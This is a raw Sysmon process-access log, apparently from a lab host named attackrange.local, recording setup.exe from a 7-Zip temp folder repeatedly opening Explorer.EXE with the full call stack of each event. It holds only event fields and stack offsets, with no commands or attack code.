13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|